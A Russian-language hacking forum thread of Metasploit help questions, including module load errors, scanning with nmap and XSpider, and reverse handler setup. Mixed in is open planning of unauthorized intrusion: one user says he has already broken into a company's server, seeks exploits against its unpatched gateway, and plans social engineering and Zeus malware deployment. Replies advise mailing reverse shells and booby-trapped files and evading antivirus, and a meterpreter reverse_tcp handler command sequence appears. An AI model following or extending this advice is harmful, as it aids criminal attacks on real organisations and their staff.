Установил Metasploit3.2 обновил Oniine Update запускаю Metasploit 3GUI выдает (Точка входа в процедуру XmlInitUnknownEncoding NS не найдена в библиотеке DLL xmlparsa.dll) в Metasploit 3Web входит. А запускаю с Development вобще не запускается. Пошел другим путем. Скачал с оф сайта metasploit3.3 установил,обновил стала запускатся но при вводе в console (use ms08_067_netapi пишет failed to load module) подскажите в чем проблема?
Вообще какое отличие команд в cmd !?Допустим на удаленной машине тупо даж start calc не выполняется или надо полный путь прописывать к файлу ? Не думаю что это так просто не понимаю разницы выполнения команд в моем cmd и в cmd жертвы
ребят, столкнулся с такой проблемой, после указания всех параметров, появляется такая строка (running) и на этом весе заканчивается, тоесть ждать можно до бесконечности, как бы все запускается но я в этом сомневаюсь, слишком уж долго. Вот все команды, я думаю помогут >> use multi/handler >> set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp >> set LHOST 46.0.138.16 LHOST => 46.0.138.16 >> exploit [*] Started reverse handler [*] Starting the payload handler...(running) >> exploit [*] Started reverse handler [*] Starting the payload handler... (running) PS ver 3.2
Вопрос на засыпку Установил msf 3.6. Цель - корпоративный шлюз в инет. На нем радмин стоит. WS2003 принципиально не обновляется (да, такие идиоты еще есть). Каспер ИС. Сканировал XSpider'ом: TCP порты - открытые : 2 - закрытые : 1 - недоступные : 65532 - порт 25/tcp сервер SMTP - отправка почты (не работает) - порт 110/tcp сервер POP3 - получение почты (не работает) Исходя из этих данных, уважаемые местные старожилы, какой бы эксплойт предложили подсунуть msf в первую очередь? Крайне интересует мнение lebed. Готов поделиться трофеями.
1. Кто не обновляет систему регулярно - совсем не идиоты, а как раз наоборот (сервер часто падает после обновления, особенно если версия пиратка). Так что выключить автоматическое обновление и не доверять БГ- просто обязанность каждого норм. админа. 2. Открыто всего два порта, поэтому дело глухо, т.е. атака на сервисы не прокатит. 3. Тут мне видится один вариант взлома - засылка реверсшелла на почту сервера + СИ чтоб его запустили, либо отсылка сплоитов начинённых реверс-шеллом (анимированные курсоры, тот жe WMF, сплоит использующий относительно новый баг в обработке иконок и т.п.). Т.е. ломать надо изнутри + обезвредить, либо обойти KIS при этом, что не так просто сделать...
Если сессия создается,но через несколько секунд сама закрывается,значит дело в том что уязвимости нет ?
2-=lebed=- Спорно, но не суть. На самом деле там не обновляется даже винда на рабочих станциях. Я уже проник на один из их серверов. Это второй, самый вкусный, через него видна вся локальная сеть. Там ещё один порт открыт - 4899, но экспайдер его не видит. Будешь смеяться, но я тоже так подумал. Задумка такая - тут открылась новая дыра в MS 2003-м - http://www.cybersecurity.ru/news/112031.html, в принципе, у меня есть мыло админов, может прокатить эксплойт ms11_xxx_createsizeddibsection.rb плюс СИ, разумеется. Далее - какую прогу запускать - или из реестра вытащить хеш радминовского пароля или не мелочиться и развернуть зевс, есть у меня старенькая версия. Как его разворачивать ещё не знаю, но думаю справлюсь. Как тебе такой вариант? ps Насчёт КИСа уже не уверен, но вот нод32 точно есть. pps Я его точно сломаю, только пока не знаю как, есть у меня такое горячее желание.
у когонибудь была такая проблема, что в консольном режиме печатает только русскими буквами? И если да, то как её решить?
зевс - как бы ботнет, хочешь админку его туда поставить? P.S. Пробуй разные сплоиты. (отсылка на мыло и т.п.) P.P.S. У меня опера последняя пробилась на автосерфинге одном, стоял KIS6 с последними базами, Каспер запалил конечно проникновение, часть локнул, убил, но один процессик не убиваемый, запускаемый через rundll32 с названием opera.exe остался в памяти.
такая проблема. Допустим я если сканю хСпайдером определенный ип, то он выдаёт его открытые порты, и уязвимости. А если я прописываю в метасплоите пишу db_nmap и этот адрес, то он выдаёт типо он адрес мертовый и всё. Что делать? (П.С. Если допустим я подключаюсь с Удаленого рабочего стола на этот ип с портом 3389 то всё какбы нормально. Как в нмпапе указать порт?
Подскажите что значит ошибка - Failed to load the OCI library: no such file to load -- oci8 и что это OCI library? версия Framework 3.5.2.
ребят, если сканировать IP диапозоны и искать хосты нужно ли IP свой прятать при помощи дедика или VPNа ???
ms 3.5.2 Такая проблема: Посотавил свежий 3.5.2 релиз (окна), запускаю консоль, НЕ печатает (просто не реагирует на нажатия клавиш). В чем может быть дело? (ставил на eng xp)
Здравствуйте подскажите можно ли с помощью метасплоита эксплуатировать машины не в локальной сети, если да то какие настройки нада прописывать(я сижу под натом) напримере этого эксплоита server/browser_autopwn Заранее спасибо
Помогите запустить MFS3.6.0 на Ubuntu... не могу запустить mfsconsole =( вообще что делать то надо.. компилировать?? если да то нету файлов для компиляции..(
